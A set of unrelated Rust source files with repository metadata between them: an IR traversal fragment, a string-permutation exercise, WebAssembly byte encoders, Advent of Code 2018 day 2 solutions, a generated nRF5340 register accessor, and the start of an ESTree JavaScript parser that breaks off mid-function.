should_trace: impl Fn(ir::Value) -> bool,
mut visit: impl FnMut(&mut Allocs, ir::Value),
) {
allocs.dfs_stack.push(StackEntry::Trace(val));
while let Some(entry) = allocs.dfs_stack.pop() {
match entry {
StackEntry::Visit(val) => {
let is_new = allocs.dfs_seen.insert(val);
if is_new {
visit(allocs, val);
}
}
StackEntry::Trace(val) => {
if allocs.dfs_seen.contains(&val) {
continue;
}
allocs.dfs_stack.push(StackEntry::Visit(val));
if should_trace(val) {
if let ir::ValueDef::Result(inst, 0) = dfg.value_def(val) {
let args = dfg.inst_args(inst);
for v in args.iter().rev().copied() {
allocs.dfs_stack.push(StackEntry::Trace(v));
}
}
}
}
}
}
}
| true |
c5a44995eada26a3f50ef14959b364ca74afa37c
|
Rust
|
shreyasdamle/rust_101
|
/src/ctci_02.rs
|
UTF-8
| 1,125 | 3.90625 | 4 |
[
"MIT"
] |
permissive
|
use std::collections::HashMap;
pub fn run() {
let result = is_permutation("abc", "cba");
println!("Result: {}", result);
}
//CTCI: Is permutation
fn is_permutation(input1: &str, input2: &str) -> bool {
if input1.len() != input2.len() {
return false;
}
let count_map_input1 = count_char(input1);
let count_map_input2 = count_char(input2);
if count_map_input1 == count_map_input2 {
return true;
}
false
}
fn count_char(s: &str) -> HashMap<char, i32> {
let mut map: HashMap<char, i32> = HashMap::new();
for c in s.chars() {
if let Some(count) = map.get_mut(&c) {
*count += 1;
} else {
map.insert(c, 1);
}
}
map
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_is_permutation() {
assert_eq!(
is_permutation(&String::from("asdf"), &String::from("dsaf")),
true
);
assert_eq!(is_permutation("asdf", "safd"), true);
assert_eq!(is_permutation("asdf", "zsdf"), false);
assert_eq!(is_permutation("alex", "alet"), false);
}
}
| true |
b03cb0d29aff7258f8a8875eedae9c7181fcbcbd
|
Rust
|
KeenS/WebAssembler-rs
|
/src/util.rs
|
UTF-8
| 1,992 | 3.109375 | 3 |
[] |
no_license
|
#[inline]
pub fn write_uint8(buf: &mut Vec<u8>, u: u8) -> usize {
buf.push(u);
1
}
#[inline]
pub fn write_uint16(buf: &mut Vec<u8>, u: u16) -> usize {
let mut size = 0;
size += write_uint8(buf, (u & 0xff) as u8);
size += write_uint8(buf, ((u >> 8) & 0xff) as u8);
size
}
#[inline]
pub fn write_uint32(buf: &mut Vec<u8>, u: u32) -> usize {
let mut size = 0;
size += write_uint16(buf, (u & 0xffff) as u16);
size += write_uint16(buf, ((u >> 16) & 0xffff) as u16);
size
}
#[inline]
pub fn write_uint64(buf: &mut Vec<u8>, u: u64) -> usize {
let mut size = 0;
size += write_uint32(buf, (u & 0xffffffff) as u32);
size += write_uint32(buf, ((u >> 32) & 0xffffffff) as u32);
size
}
#[inline]
pub fn write_varuint1(buf: &mut Vec<u8>, u: u8) -> usize {
write_uint8(buf, u)
}
#[allow(dead_code)]
#[inline]
pub fn write_varuint7(buf: &mut Vec<u8>, u: u8) -> usize {
write_uint8(buf, u)
}
#[inline]
pub fn write_varint7(buf: &mut Vec<u8>, i: i8) -> usize {
write_uint8(buf, (i as u8) ^ 0x80)
}
macro_rules! gen_write_var {
($name: ident, $ty: ty) => {
#[inline]
#[allow(unused_comparisons)]
#[allow(overflowing_literals)]
pub fn $name(buf: &mut Vec<u8>, mut u: $ty) -> usize {
let end: i8 = if u < 0 { 0xff } else { 0 };
let mut size = 0;
let bit7 = 0b01111111;
let mut cur: u8 = (u & bit7) as u8;
// rust generates sar for i32 by >>
u >>= 7;
while u != (end as $ty) {
size += write_uint8(buf, cur | 0x80);
cur = (u & bit7) as u8;
u >>= 7;
}
size += write_uint8(buf, cur);
size
}
}
}
gen_write_var!(write_varuint32, u32);
gen_write_var!(write_varint32, i32);
gen_write_var!(write_varint64, i64);
#[inline]
pub fn write_slice(buf: &mut Vec<u8>, u: &[u8]) -> usize {
buf.extend_from_slice(u);
u.len()
}
| true |
017b97b3fc23083cf32f4470f62d90f4569c4abf
|
Rust
|
alecdwm/advent-of-code
|
/src/year_2018/day2.rs
|
UTF-8
| 5,602 | 3.859375 | 4 |
[] |
no_license
|
//! --- Day 2: Inventory Management System ---
//!
//! You stop falling through time, catch your breath, and check the screen on the device. "Destination reached. Current Year: 1518. Current Location: North Pole Utility Closet 83N10." You made it! Now, to find those anomalies.
//!
//! Outside the utility closet, you hear footsteps and a voice. "...I'm not sure either. But now that so many people have chimneys, maybe he could sneak in that way?" Another voice responds, "Actually, we've been working on a new kind of suit that would let him fit through tight spaces like that. But, I heard that a few days ago, they lost the prototype fabric, the design plans, everything! Nobody on the team can even seem to remember important details of the project!"
//!
//! "Wouldn't they have had enough fabric to fill several boxes in the warehouse? They'd be stored together, so the box IDs should be similar. Too bad it would take forever to search the warehouse for two similar box IDs..." They walk too far away to hear any more.
use std::collections::BTreeMap;
/// Late at night, you sneak to the warehouse - who knows what kinds of paradoxes you could cause if you were discovered - and use your fancy wrist device to quickly scan every box and produce a list of the likely candidates (your puzzle input).
///
/// To make sure you didn't miss any, you scan the likely candidate boxes again, counting the number that have an ID containing exactly two of any letter and then separately counting those with exactly three of any letter. You can multiply those two counts together to get a rudimentary checksum and compare it to what your device predicts.
///
/// For example, if you see the following box IDs:
///
/// abcdef contains no letters that appear exactly two or three times.
/// bababc contains two a and three b, so it counts for both.
/// abbcde contains two b, but no letter appears exactly three times.
/// abcccd contains three c, but no letter appears exactly two times.
/// aabcdd contains two a and two d, but it only counts once.
/// abcdee contains two e.
/// ababab contains three a and three b, but it only counts once.
///
/// Of these box IDs, four of them contain a letter which appears exactly twice, and three of them contain a letter which appears exactly three times. Multiplying these together produces a checksum of 4 * 3 = 12.
///
/// What is the checksum for your list of box IDs?
pub fn part1() {
let input = crate::common::read_stdin_to_string();
let mut two_letter_checksum_component: i64 = 0;
let mut three_letter_checksum_component: i64 = 0;
let mut seen_letter_counts: BTreeMap<char, i64> = BTreeMap::new();
for box_id in input.lines() {
for letter in box_id.chars() {
let count = (match seen_letter_counts.get(&letter) {
Some(count) => count,
None => &0,
}) + 1;
seen_letter_counts.insert(letter, count);
}
let mut seen_two = false;
let mut seen_three = false;
for count in seen_letter_counts.values() {
if !seen_two && *count == 2 {
seen_two = true;
two_letter_checksum_component += 1;
}
if !seen_three && *count == 3 {
seen_three = true;
three_letter_checksum_component += 1;
}
if seen_two && seen_three {
break;
}
}
seen_letter_counts.clear();
}
let checksum = two_letter_checksum_component * three_letter_checksum_component;
println!("the checksum for your list of box IDs: {}", checksum);
}
/// Confident that your list of box IDs is complete, you're ready to find the boxes full of prototype fabric.
///
/// The boxes will have IDs which differ by exactly one character at the same position in both strings. For example, given the following box IDs:
///
/// abcde
/// fghij
/// klmno
/// pqrst
/// fguij
/// axcye
/// wvxyz
///
/// The IDs abcde and axcye are close, but they differ by two characters (the second and fourth). However, the IDs fghij and fguij differ by exactly one character, the third (h and u). Those must be the correct boxes.
///
/// What letters are common between the two correct box IDs? (In the example above, this is found by removing the differing character from either ID, producing fgij.)
pub fn part2() {
let input = crate::common::read_stdin_to_string();
let matches = find_part2_matches(&input).expect("No matches found");
let common_letters: String = matches
.0
.chars()
.zip(matches.1.chars())
.filter(|(letter_1, letter_2)| letter_1 == letter_2)
.map(|letters| letters.0)
.collect();
println!(
"the common letters between the two correct box IDs: {}",
common_letters
);
}
fn find_part2_matches(input: &str) -> Option<(String, String)> {
for box_id_1 in input.lines() {
'test_inner: for box_id_2 in input.lines() {
if box_id_1 == box_id_2 {
continue;
}
let mut differences = 0;
for (letter_1, letter_2) in box_id_1.chars().zip(box_id_2.chars()) {
if letter_1 != letter_2 {
differences += 1;
if differences > 1 {
continue 'test_inner;
}
}
}
if differences == 1 {
return Some((box_id_1.to_string(), box_id_2.to_string()));
}
}
}
None
}
| true |
1f8c9cabdc88d7113c1277f9a603aa131c18c019
|
Rust
|
nrf-rs/nrf-pacs
|
/pacs/nrf5340-app-pac/src/cache_s/writelock.rs
|
UTF-8
| 4,102 | 2.578125 | 3 |
[
"0BSD"
] |
permissive
|
#[doc = "Register `WRITELOCK` reader"]
pub struct R(crate::R<WRITELOCK_SPEC>);
impl core::ops::Deref for R {
type Target = crate::R<WRITELOCK_SPEC>;
#[inline(always)]
fn deref(&self) -> &Self::Target {
&self.0
}
}
impl From<crate::R<WRITELOCK_SPEC>> for R {
#[inline(always)]
fn from(reader: crate::R<WRITELOCK_SPEC>) -> Self {
R(reader)
}
}
#[doc = "Register `WRITELOCK` writer"]
pub struct W(crate::W<WRITELOCK_SPEC>);
impl core::ops::Deref for W {
type Target = crate::W<WRITELOCK_SPEC>;
#[inline(always)]
fn deref(&self) -> &Self::Target {
&self.0
}
}
impl core::ops::DerefMut for W {
#[inline(always)]
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.0
}
}
impl From<crate::W<WRITELOCK_SPEC>> for W {
#[inline(always)]
fn from(writer: crate::W<WRITELOCK_SPEC>) -> Self {
W(writer)
}
}
#[doc = "Field `WRITELOCK` reader - Lock cache updates"]
pub type WRITELOCK_R = crate::BitReader<WRITELOCK_A>;
#[doc = "Lock cache updates\n\nValue on reset: 0"]
#[derive(Clone, Copy, Debug, PartialEq)]
pub enum WRITELOCK_A {
#[doc = "0: Cache updates unlocked"]
UNLOCKED = 0,
#[doc = "1: Cache updates locked"]
LOCKED = 1,
}
impl From<WRITELOCK_A> for bool {
#[inline(always)]
fn from(variant: WRITELOCK_A) -> Self {
variant as u8 != 0
}
}
impl WRITELOCK_R {
#[doc = "Get enumerated values variant"]
#[inline(always)]
pub fn variant(&self) -> WRITELOCK_A {
match self.bits {
false => WRITELOCK_A::UNLOCKED,
true => WRITELOCK_A::LOCKED,
}
}
#[doc = "Checks if the value of the field is `UNLOCKED`"]
#[inline(always)]
pub fn is_unlocked(&self) -> bool {
*self == WRITELOCK_A::UNLOCKED
}
#[doc = "Checks if the value of the field is `LOCKED`"]
#[inline(always)]
pub fn is_locked(&self) -> bool {
*self == WRITELOCK_A::LOCKED
}
}
#[doc = "Field `WRITELOCK` writer - Lock cache updates"]
pub type WRITELOCK_W<'a, const O: u8> = crate::BitWriter<'a, u32, WRITELOCK_SPEC, WRITELOCK_A, O>;
impl<'a, const O: u8> WRITELOCK_W<'a, O> {
#[doc = "Cache updates unlocked"]
#[inline(always)]
pub fn unlocked(self) -> &'a mut W {
self.variant(WRITELOCK_A::UNLOCKED)
}
#[doc = "Cache updates locked"]
#[inline(always)]
pub fn locked(self) -> &'a mut W {
self.variant(WRITELOCK_A::LOCKED)
}
}
impl R {
#[doc = "Bit 0 - Lock cache updates"]
#[inline(always)]
pub fn writelock(&self) -> WRITELOCK_R {
WRITELOCK_R::new((self.bits & 1) != 0)
}
}
impl W {
#[doc = "Bit 0 - Lock cache updates"]
#[inline(always)]
pub fn writelock(&mut self) -> WRITELOCK_W<0> {
WRITELOCK_W::new(self)
}
#[doc = "Writes raw bits to the register."]
#[inline(always)]
pub unsafe fn bits(&mut self, bits: u32) -> &mut Self {
self.0.bits(bits);
self
}
}
#[doc = "Lock cache updates. Prevents updating of cache content on cache misses, but will continue to lookup instruction/data fetches in content already present in the cache. Ignored in RAM mode.\n\nThis register you can [`read`](crate::generic::Reg::read), [`write_with_zero`](crate::generic::Reg::write_with_zero), [`reset`](crate::generic::Reg::reset), [`write`](crate::generic::Reg::write), [`modify`](crate::generic::Reg::modify). See [API](https://docs.rs/svd2rust/#read--modify--write-api).\n\nFor information about available fields see [writelock](index.html) module"]
pub struct WRITELOCK_SPEC;
impl crate::RegisterSpec for WRITELOCK_SPEC {
type Ux = u32;
}
#[doc = "`read()` method returns [writelock::R](R) reader structure"]
impl crate::Readable for WRITELOCK_SPEC {
type Reader = R;
}
#[doc = "`write(|w| ..)` method takes [writelock::W](W) writer structure"]
impl crate::Writable for WRITELOCK_SPEC {
type Writer = W;
}
#[doc = "`reset()` method sets WRITELOCK to value 0"]
impl crate::Resettable for WRITELOCK_SPEC {
#[inline(always)]
fn reset_value() -> Self::Ux {
0
}
}
| true |
c6e7ab01a75b56fdd8294771e02ae57958cb606e
|
Rust
|
EarlGray/language-incubator
|
/js/slothjs/src/parse/mod.rs
|
UTF-8
| 30,647 | 2.953125 | 3 |
[
"BSD-3-Clause"
] |
permissive
|
pub mod estree;
mod heapnode;
mod jsonnode;
#[cfg(test)]
mod test;
use crate::prelude::*;
use crate::ast::*; // yes, EVERYTHING.
use crate::error::ParseError;
use crate::source;
use crate::JSON;
pub use self::heapnode::HeapNode;
type ParseResult<T> = Result<T, ParseError>;
/// `ParserContext` collects lexical scope information to be used later.
#[derive(Debug)]
pub struct ParserContext {
pub declared_bindings: HashSet<Identifier>, // let|const ...
pub declared_functions: Vec<FunctionDeclaration>, // function ...
pub declared_variables: HashSet<Identifier>, // var ...
pub used_identifiers: HashSet<Identifier>, // note: they are not free before they leave the scope
}
impl ParserContext {
pub fn new() -> ParserContext {
ParserContext {
used_identifiers: HashSet::new(),
declared_bindings: HashSet::new(),
declared_variables: HashSet::new(),
declared_functions: Vec::new(),
}
}
fn remember_declaration(
&mut self,
kind: DeclarationKind,
name: &Identifier,
) -> Result<(), ParseError> {
let in_bindings = self.declared_bindings.contains(name);
let in_variables = self.declared_variables.contains(name);
match (kind, in_bindings, in_variables) {
(DeclarationKind::Var, false, _) => self.declared_variables.insert(name.clone()),
(DeclarationKind::Let, false, _) => self.declared_bindings.insert(name.clone()),
_ => return Err(ParseError::BindingRedeclared {}),
};
Ok(())
}
fn enter_block_scope<T, F>(&mut self, mut action: F) -> ParseResult<(T, HashSet<Identifier>)>
where
F: FnMut(&mut ParserContext) -> ParseResult<T>,
{
// inner_ctx accumulates used identifiers and declared bindings.
let mut inner_ctx = ParserContext::new();
core::mem::swap(
&mut self.declared_variables,
&mut inner_ctx.declared_variables,
);
core::mem::swap(
&mut self.declared_functions,
&mut inner_ctx.declared_functions,
);
let result = action(&mut inner_ctx);
core::mem::swap(
&mut self.declared_variables,
&mut inner_ctx.declared_variables,
);
core::mem::swap(
&mut self.declared_functions,
&mut inner_ctx.declared_functions,
);
let ParserContext {
declared_bindings: bindings,
used_identifiers: mut used_variables,
..
} = inner_ctx;
for binding in bindings.iter() {
used_variables.remove(binding);
}
// add all remaining usages to the outer used_variables
self.used_identifiers.extend(used_variables);
// put declared bindings into BlockStatement; discard them from ParserContext
let result = result?;
Ok((result, bindings))
}
}
/// `ParseFrom` is a unifying interface for constructing all `ast::*` types.
///
/// It's not strictly necessary, `impl ast::X { fn parse_from(...) -> ParseResult<X> {...} }`
/// would do just fine. On the other hand, it feels like a good idea to have all of these
/// to conform to one interface.
trait ParseFrom: Sized {
fn parse_from<S>(source: &S, ctx: &mut ParserContext) -> ParseResult<Self>
where
S: SourceNode;
}
/// `SourceNode` is how `ParseFrom::parse_from` sees AST nodes.
pub trait SourceNode: Sized {
/// Location of the node where an error happened.
fn to_error(&self) -> JSON;
/// Try to get source mapping for `self`.
fn get_location(&self) -> Option<source::Location>;
/// Use the node as a literal.
fn get_literal(&self, property: &str) -> ParseResult<Literal>;
/// Get the boolean value of a child node with name `property`.
/// It's a ParseError if it does not exist or does not have a boolean meaning.
fn get_bool(&self, property: &str) -> ParseResult<bool>;
/// Get the string value of a child node with name `property`.
/// It's a ParseError if it does not exist or does not have a string meaning.
fn get_str(&self, property: &str) -> ParseResult<JSString>;
/// Check that the value of `property` is a string equal to `value`.
/// Depends on [`SourceNode::get_str`].
fn expect_str(&self, property: &str, value: &'static str) -> ParseResult<()> {
let got = self.get_str(property)?;
match got.as_str() == value {
true => Ok(()),
false => Err(ParseError::UnexpectedValue {
want: value,
value: self.to_error(),
}),
}
}
/// Get a child node with this name; if it does not exist, return None.
/// Then transform it through `action`, propagating its Result out.
/// A child node exis
fn map_node<T, F>(&self, property: &str, action: F) -> ParseResult<T>
where
F: FnMut(&Self) -> ParseResult<T>;
fn map_opt_node<T, F>(&self, property: &str, action: F) -> ParseResult<Option<T>>
where
F: FnMut(&Self) -> ParseResult<T>,
{
match self.map_node(property, action) {
Ok(stmt) => Ok(Some(stmt)),
Err(ParseError::ObjectWithout { .. }) => Ok(None),
Err(e) => Err(e),
}
}
/// Map the array of children of a child node with name `property`.
/// It's a ParseError if it does not exist or does not have an array meaning.
fn map_array<T, F>(&self, property: &str, func: F) -> ParseResult<Vec<T>>
where
F: FnMut(&Self) -> ParseResult<T>;
}
impl Program {
/// Makes a [`Program`] from anything that implements [`SourceNode`]
///
/// e.g. from a [`JSON`] ESTree.
pub fn parse_from<S: SourceNode>(source: &S) -> ParseResult<Program> {
source.expect_str("type", "Program")?;
let mut ctx = ParserContext::new();
let body = BlockStatement::parse_from(source, &mut ctx)?;
let ParserContext {
declared_variables: variables,
declared_functions: functions,
..
} = ctx;
Ok(Program {
body,
variables,
functions,
})
}
}
impl ParseFrom for Statement {
fn parse_from<S: SourceNode>(source: &S, ctx: &mut ParserContext) -> ParseResult<Self> {
let loc = source.get_location().map(Box::new);
let typ = source.get_str("type")?;
let stmt = match typ.as_str() {
"BlockStatement" => Stmt::Block(BlockStatement::parse_from(source, ctx)?),
"BreakStatement" => Stmt::Break(BreakStatement::parse_from(source, ctx)?),
"ContinueStatement" => Stmt::Continue(ContinueStatement::parse_from(source, ctx)?),
"DoWhileStatement" => {
let mut stmt = ForStatement::parse_from(source, ctx)?;
stmt.init = stmt.body.clone();
Stmt::For(Box::new(stmt))
}
"EmptyStatement" => Stmt::Empty,
"ExpressionStatement" => Stmt::Expr(ExpressionStatement::parse_from(source, ctx)?),
"ForStatement" | "WhileStatement" => {
let stmt = ForStatement::parse_from(source, ctx)?;
Stmt::For(Box::new(stmt))
}
"ForInStatement" => {
let stmt = ForInStatement::parse_from(source, ctx)?;
Stmt::ForIn(Box::new(stmt))
}
"FunctionDeclaration" => Stmt::Function(FunctionDeclaration::parse_from(source, ctx)?),
"IfStatement" => {
let stmt = IfStatement::parse_from(source, ctx)?;
Stmt::If(Box::new(stmt))
}
"LabeledStatement" => {
let stmt = LabelStatement::parse_from(source, ctx)?;
Stmt::Label(Box::new(stmt))
}
"ReturnStatement" => Stmt::Return(ReturnStatement::parse_from(source, ctx)?),
"SwitchStatement" => Stmt::Switch(SwitchStatement::parse_from(source, ctx)?),
"ThrowStatement" => Stmt::Throw(ThrowStatement::parse_from(source, ctx)?),
"TryStatement" => Stmt::Try(TryStatement::parse_from(source, ctx)?),
"VariableDeclaration" => Stmt::Variable(VariableDeclaration::parse_from(source, ctx)?),
_ => {
return Err(ParseError::UnknownNodeType {
value: source.to_error(),
})
}
};
Ok(Statement { stmt, loc })
}
}
impl ParseFrom for BlockStatement {
fn parse_from<S: SourceNode>(source: &S, ctx: &mut ParserContext) -> ParseResult<Self> {
let (body, bindings) = ctx.enter_block_scope(|ctx| {
source.map_array("body", |jstmt| Statement::parse_from(jstmt, ctx))
})?;
Ok(BlockStatement { body, bindings })
}
}
impl ParseFrom for IfStatement {
fn parse_from<S: SourceNode>(source: &S, ctx: &mut ParserContext) -> ParseResult<Self> {
source.expect_str("type", "IfStatement")?;
let test = source.map_node("test", |jtest| Expression::parse_from(jtest, ctx))?;
let consequent =
source.map_node("consequent", |jthen| Statement::parse_from(jthen, ctx))?;
let alternate =
match source.map_node("alternate", |jelse| Statement::parse_from(jelse, ctx)) {
Ok(stmt) => Some(stmt),
Err(ParseError::ObjectWithout { .. }) => None,
Err(e) => return Err(e),
};
Ok(IfStatement {
test,
consequent,
alternate,
})
}
}
impl ParseFrom for SwitchStatement {
fn parse_from<S: SourceNode>(source: &S, ctx: &mut ParserContext) -> ParseResult<Self> {
source.expect_str("type", "SwitchStatement")?;
let discriminant = source.map_node("discriminant", |jdiscriminant| {
Expression::parse_from(jdiscriminant, ctx)
})?;
let cases = source.map_array("cases", |jcase| {
let test = jcase.map_opt_node("test", |jtest| Expression::parse_from(jtest, ctx))?;
let consequent =
jcase.map_array("consequent", |jstmt| Statement::parse_from(jstmt, ctx))?;
Ok(SwitchCase { test, consequent })
})?;
Ok(SwitchStatement {
discriminant,
cases,
})
}
}
impl ParseFrom for ForStatement {
fn parse_from<S: SourceNode>(source: &S, ctx: &mut ParserContext) -> ParseResult<Self> {
let for_ok = source.expect_str("type", "ForStatement");
let while_ok = source.expect_str("type", "WhileStatement");
let dowhile_ok = source.expect_str("type", "DoWhileStatement");
for_ok.or(while_ok).or(dowhile_ok)?;
let init = source
.map_opt_node("init", |jinit| {
if let Ok(var) = VariableDeclaration::parse_from(jinit, ctx) {
let stmt = Stmt::Variable(var);
Ok(Statement { stmt, loc: None })
} else if let Ok(expr) = Expression::parse_from(jinit, ctx) {
let stmt = Stmt::Expr(ExpressionStatement { expression: expr });
Ok(Statement { stmt, loc: None })
} else {
Err(ParseError::UnexpectedValue {
want: "variable or expression",
value: jinit.to_error(),
})
}
})?
.unwrap_or(Statement {
stmt: Stmt::Empty,
loc: None,
});
let test = source.map_opt_node("test", |jtest| Expression::parse_from(jtest, ctx))?;
let update =
source.map_opt_node("update", |jupdate| Expression::parse_from(jupdate, ctx))?;
let body = source.map_node("body", |jbody| Statement::parse_from(jbody, ctx))?;
Ok(ForStatement {
init,
test,
update,
body,
})
}
}
impl ParseFrom for ForInStatement {
fn parse_from<S: SourceNode>(source: &S, ctx: &mut ParserContext) -> ParseResult<Self> {
source.expect_str("type", "ForInStatement")?;
let left = source.map_node("left", |jleft| {
if let Ok(vardecl) = VariableDeclaration::parse_from(jleft, ctx) {
if vardecl.declarations.len() != 1 {
return Err(ParseError::ForInMultipleVar());
}
Ok(ForInTarget::Var(vardecl))
} else if let Ok(expr) = Expression::parse_from(jleft, ctx) {
Ok(ForInTarget::Expr(expr))
} else {
Err(ParseError::UnexpectedValue {
want: "VariableDeclaration | Pattern",
value: jleft.to_error(),
})
}
})?;
let right = source.map_node("right", |jright| Expression::parse_from(jright, ctx))?;
let body = source.map_node("body", |jbody| Statement::parse_from(jbody, ctx))?;
Ok(ForInStatement { left, right, body })
}
}
impl ParseFrom for BreakStatement {
fn parse_from<S: SourceNode>(source: &S, ctx: &mut ParserContext) -> ParseResult<Self> {
source.expect_str("type", "BreakStatement")?;
let label = source.map_opt_node("label", |jlabel| Identifier::parse_from(jlabel, ctx))?;
Ok(BreakStatement(label))
}
}
impl ParseFrom for ContinueStatement {
fn parse_from<S: SourceNode>(source: &S, ctx: &mut ParserContext) -> ParseResult<Self> {
source.expect_str("type", "ContinueStatement")?;
let label = source.map_opt_node("label", |jlabel| Identifier::parse_from(jlabel, ctx))?;
Ok(ContinueStatement(label))
}
}
impl ParseFrom for LabelStatement {
fn parse_from<S: SourceNode>(source: &S, ctx: &mut ParserContext) -> ParseResult<Self> {
source.expect_str("type", "LabeledStatement")?;
let label = source.map_node("label", |jlabel| Identifier::parse_from(jlabel, ctx))?;
let body = source.map_node("body", |jbody| Statement::parse_from(jbody, ctx))?;
Ok(LabelStatement(label, body))
}
}
impl ParseFrom for ReturnStatement {
fn parse_from<S: SourceNode>(source: &S, ctx: &mut ParserContext) -> ParseResult<Self> {
source.expect_str("type", "ReturnStatement")?;
let argument =
source.map_opt_node("argument", |jobject| Expression::parse_from(jobject, ctx))?;
Ok(ReturnStatement(argument))
}
}
impl ParseFrom for ThrowStatement {
fn parse_from<S: SourceNode>(source: &S, ctx: &mut ParserContext) -> ParseResult<Self> {
source.expect_str("type", "ThrowStatement")?;
let argument = source.map_node("argument", |jarg| Expression::parse_from(jarg, ctx))?;
Ok(ThrowStatement(argument))
}
}
impl ParseFrom for TryStatement {
fn parse_from<S: SourceNode>(source: &S, ctx: &mut ParserContext) -> ParseResult<Self> {
source.expect_str("type", "TryStatement")?;
let block = source.map_node("block", |jblock| BlockStatement::parse_from(jblock, ctx))?;
let handler = source.map_opt_node("handler", |jhandler| {
let param = jhandler.map_node("param", |jparam| Identifier::parse_from(jparam, ctx))?;
let body = jhandler.map_node("body", |jbody| BlockStatement::parse_from(jbody, ctx))?;
Ok(CatchClause { param, body })
})?;
let finalizer = source.map_opt_node("finalizer", |jobject| {
BlockStatement::parse_from(jobject, ctx)
})?;
Ok(TryStatement {
block,
handler,
finalizer,
})
}
}
impl ParseFrom for VariableDeclaration {
fn parse_from<S: SourceNode>(source: &S, ctx: &mut ParserContext) -> ParseResult<Self> {
source.expect_str("type", "VariableDeclaration")?;
let kind = match source.get_str("kind")?.as_str() {
"const" => todo!("DeclarationKind::Const"),
"let" => DeclarationKind::Let,
"var" => DeclarationKind::Var,
_ => {
return Err(ParseError::UnexpectedValue {
want: "var | let | const",
value: source.map_node("kind", |node| Ok(node.to_error()))?,
})?;
}
};
let declarations = source.map_array("declarations", |decl| {
decl.expect_str("type", "VariableDeclarator")?;
let name = decl.map_node("id", |jid| Identifier::parse_from(jid, ctx))?;
let init = decl.map_opt_node("init", |jinit| {
let expr = Expression::parse_from(jinit, ctx)?;
Ok(Box::new(expr))
})?;
ctx.remember_declaration(kind, &name)?;
Ok(VariableDeclarator { name, init })
})?;
Ok(VariableDeclaration { kind, declarations })
}
}
impl ParseFrom for FunctionDeclaration {
fn parse_from<S: SourceNode>(source: &S, ctx: &mut ParserContext) -> ParseResult<Self> {
source.expect_str("type", "FunctionDeclaration")?;
// Reuse similar structure of FunctionExpression and FunctionDeclaration trees:
let function = FunctionExpression::parse_from(source, ctx)?;
// id is mandatory in FunctionDeclaration:
let id = (function.func.id.clone())
.ok_or_else(|| ParseError::no_attr("id", source.to_error()))?;
let funcdecl = FunctionDeclaration { id, function };
ctx.declared_functions.push(funcdecl.clone());
Ok(funcdecl)
}
}
impl ParseFrom for ExpressionStatement {
fn parse_from<S: SourceNode>(source: &S, ctx: &mut ParserContext) -> ParseResult<Self> {
source.expect_str("type", "ExpressionStatement")?;
let expression =
source.map_node("expression", |jexpr| Expression::parse_from(jexpr, ctx))?;
Ok(ExpressionStatement { expression })
}
}
impl ParseFrom for Expression {
fn parse_from<S: SourceNode>(source: &S, ctx: &mut ParserContext) -> ParseResult<Self> {
let loc = source.get_location().map(Box::new);
let expr_type = source.get_str("type")?;
let expr = match expr_type.as_str() {
"ArrayExpression" => {
let elements =
source.map_array("elements", |jelem| Expression::parse_from(jelem, ctx))?;
let expr = ArrayExpression(elements);
Expr::Array(expr)
}
"AssignmentExpression" => {
let expr = AssignmentExpression::parse_from(source, ctx)?;
Expr::Assign(Box::new(expr))
}
"BinaryExpression" => {
let expr = BinaryExpression::parse_from(source, ctx)?;
Expr::BinaryOp(Box::new(expr))
}
"CallExpression" => {
let callee =
source.map_node("callee", |jcallee| Expression::parse_from(jcallee, ctx))?;
let arguments =
source.map_array("arguments", |jarg| Expression::parse_from(jarg, ctx))?;
Expr::Call(Box::new(CallExpression(callee, arguments)))
}
"ConditionalExpression" => {
let condexpr =
source.map_node("test", |jtest| Expression::parse_from(jtest, ctx))?;
let thenexpr =
source.map_node("consequent", |jthen| Expression::parse_from(jthen, ctx))?;
let elseexpr =
source.map_node("alternate", |jelse| Expression::parse_from(jelse, ctx))?;
let expr = ConditionalExpression {
condexpr,
thenexpr,
elseexpr,
};
Expr::Conditional(Box::new(expr))
}
"FunctionExpression" => {
let expr = FunctionExpression::parse_from(source, ctx)?;
Expr::Function(expr)
}
"Identifier" => {
let expr = Identifier::parse_from(source, ctx)?;
Expr::Identifier(expr)
}
"Literal" => {
let lit = source.get_literal("value")?;
Expr::Literal(lit)
}
"LogicalExpression" => {
let expr = LogicalExpression::parse_from(source, ctx)?;
Expr::LogicalOp(Box::new(expr))
}
"MemberExpression" => {
let computed = source.get_bool("computed")?;
let object = source.map_node("object", |jobj| Expression::parse_from(jobj, ctx))?;
let property =
source.map_node("property", |jprop| Expression::parse_from(jprop, ctx))?;
let expr = MemberExpression(object, property, computed);
Expr::Member(Box::new(expr))
}
"NewExpression" => {
let callee =
source.map_node("callee", |jcallee| Expression::parse_from(jcallee, ctx))?;
let arguments =
source.map_array("arguments", |jarg| Expression::parse_from(jarg, ctx))?;
let expr = NewExpression(callee, arguments);
Expr::New(Box::new(expr))
}
"ObjectExpression" => {
let expr = ObjectExpression::parse_from(source, ctx)?;
Expr::Object(expr)
}
"SequenceExpression" => {
let expr = SequenceExpression::parse_from(source, ctx)?;
Expr::Sequence(expr)
}
"ThisExpression" => Expr::This,
"UnaryExpression" => {
let expr = UnaryExpression::parse_from(source, ctx)?;
Expr::Unary(Box::new(expr))
}
"UpdateExpression" => {
let expr = UpdateExpression::parse_from(source, ctx)?;
Expr::Update(Box::new(expr))
}
_ => {
return Err(ParseError::UnknownNodeType {
value: source.to_error(),
})
}
};
Ok(Expression { expr, loc })
}
}
impl ParseFrom for Identifier {
fn parse_from<S: SourceNode>(source: &S, ctx: &mut ParserContext) -> ParseResult<Self> {
let name = source.get_str("name")?;
let identifier = Identifier(name);
ctx.used_identifiers.insert(identifier.clone());
Ok(identifier)
}
}
impl ParseFrom for UnaryExpression {
fn parse_from<S: SourceNode>(source: &S, ctx: &mut ParserContext) -> ParseResult<Self> {
let jop = source.get_str("operator")?;
let op = match jop.as_str() {
"+" => UnOp::Plus,
"-" => UnOp::Minus,
"!" => UnOp::Exclamation,
"~" => UnOp::Tilde,
"delete" => UnOp::Delete,
"typeof" => UnOp::Typeof,
"void" => UnOp::Void,
_ => {
return Err(ParseError::UnexpectedValue {
want: "+ | - | ! | ~ | typeof | void",
value: source.to_error(),
})
}
};
let argument = source.map_node("argument", |jarg| Expression::parse_from(jarg, ctx))?;
Ok(UnaryExpression(op, argument))
}
}
impl ParseFrom for UpdateExpression {
fn parse_from<S: SourceNode>(source: &S, ctx: &mut ParserContext) -> ParseResult<Self> {
let argument = source.map_node("argument", |jarg| Expression::parse_from(jarg, ctx))?;
let prefix = source.get_bool("prefix")?;
let operator = source.get_str("operator")?;
let op = match operator.as_str() {
